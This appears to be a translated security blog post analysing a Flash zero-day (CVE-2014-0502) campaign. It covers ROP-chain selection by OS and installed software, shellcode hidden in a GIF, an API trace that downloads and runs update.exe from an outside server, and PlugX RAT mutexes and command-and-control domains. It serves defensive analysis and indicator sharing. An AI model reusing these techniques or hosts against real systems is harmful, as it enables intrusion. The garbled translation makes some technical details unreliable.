Attack behavior analysis using Adobe 0day-CVE-2014-0502

The other day, FireEye released a new 0-day attack report using AdobeFlash, and Adobe released a security update based on the vulnerability.

According to FireEye, many websites redirect visitors to the following malicious servers that contain exploit:

Peterson Institute for InternationalEconomicsAmerican Research Center in EgyptSmith Richardson Foundation

Malicious Flash file in http://4.59.XXX.XX/common/cc.swf

The Flash contains some interesting debug symbols:

C:\Users07\Desktop\FlashExp(ie)\src\cc.as

The ActionScript code in the Flash file is used to determine the operating system version and select hard-coded ROP chains to bypass ASLR.

For Windows XP, the code first checks the system language. For systems in the following two languages, it only contains the ROP chains:

English and Chinese

In this case (Windows XP system), the drop chain uses a well-known technique to extract and compile from msvcrt. dll.

If the system is running Windows 7:

-Check whether Java 1.6 or Java 1.7 is installed in the system.

-If Java1.6 is installed, the Code uses the drop chain in msvcr71.dll that comes with Java 1.6. This dll file is not protected by ASLR.

-Check whether Microsoft Office 2007 or 2010 is installed.

-If yes, use the ROP chain in hxdl. dll that comes with Microsoft Office 2007/2010. This dll is not protected by ASLR.

To load hxds. dll, you need to use a common protocol processor location. href = 'Ms-help: 'In this type of exploits :'

The following code downloads a GIF file:

Shows the downloaded file. It looks like a normal image:

 

However, the image contains a shellcode at the offset of 3344. The shellcode will be downloaded from the same server and run a PE32 file:

Using images to execute shellcode is a clever practice, because it can bypass the monitoring of many network security products.

The shellcode uses the following function to download and execute the PE32 file:

 LoadLibraryA(wininet)    LoadLibraryA(user32)    VirtualProtect(adr=404bf1, sz=4,flags=40)    SetUnhandledExceptionFilter(0)    VirtualProtect(adr=7c81cdda, sz=82,flags=40)    VirtualProtect(adr=7c81cdda, sz=82,flags=0)    SetUnhandledExceptionFilter(7c81cdda)    GetTempPath(len=104, buf=12fca4) = 14   GetTempFileName(path=C:\users\jaime\Temp\, prefix=0, unique=0,buf=12fca4) = 245D     Path = C:\users\jaime\Temp\245d.tmp    InternetOpenA()   InternetOpenUrlA(http://4.59.XX.XX/common/update.exe)   CreateFileA(C:\users\jaime\Temp\245d.tmp) = 4    InternetReadFile(1, buf: 12fbe8, size:64)    InternetCloseHandle(1) = 1    InternetCloseHandle(1) = 1    CloseHandle(4)

The payload used in this attack is a well-known remote control program PlugX RAT. I mentioned it several times in my previous blog:

Tracking down the author of the PlugX RAT

The connection between the Plugx Chinese gang and the latestInternet Explorer Zeroday

New versions of the IExplorer ZeroDay emerge targeting Defense andIndustrial companies

The malicious program will copy it to \ AllUsers \ DRM \ RasTls \ RasTls.exe and create the following mutex files during execution:

 \BaseNamedObjects\Global\dklw\BaseNamedObjects\Global\cso\BaseNamedObjects\Global\qemyqvmyhiy\BaseNamedObjects\Global\eriwjjo\BaseNamedObjects\Global\etniisebehheq\BaseNamedObjects\Global\beetxado\BaseNamedObjects\Global\zhyzrjduosfptunf\BaseNamedObjects\Global\zzusnnzeqgzupeto\BaseNamedObjects\Global\onwmkwazrynpn\BaseNamedObjects\Global\nmtg\BaseNamedObjects\Global\helbibkzhruo\BaseNamedObjects\Global\opylrvflplgad\BaseNamedObjects\Global\zgjawrojchcfavnh\BaseNamedObjects\Global\gmd\BaseNamedObjects\Global\svdwr\BaseNamedObjects\Global\unbdehrrxgqujyazj\BaseNamedObjects\Global\qpl\BaseNamedObjects\Global\ihnwguwceofkhcv\BaseNamedObjects\Global\kvxieoc\BaseNamedObjects\My_Name_horse(Svchost)

PlugX contains three different commands and control methods:

00903474 -> java[.]ns1[.]name009034B8 -> adservice[.[no-ip[.]org009034FC -> wmi[.]ns01[.]us

And interact with C & C through HTTP:

 

Note that the specified C & C domain name is maliciously constructed:

So far, I don't need to remind you that you will update Adobe and Java and Office versions that contain vulnerabilities and can be used to bypass ASLR as soon as possible.

Have a good time!

[Translated from alienvault]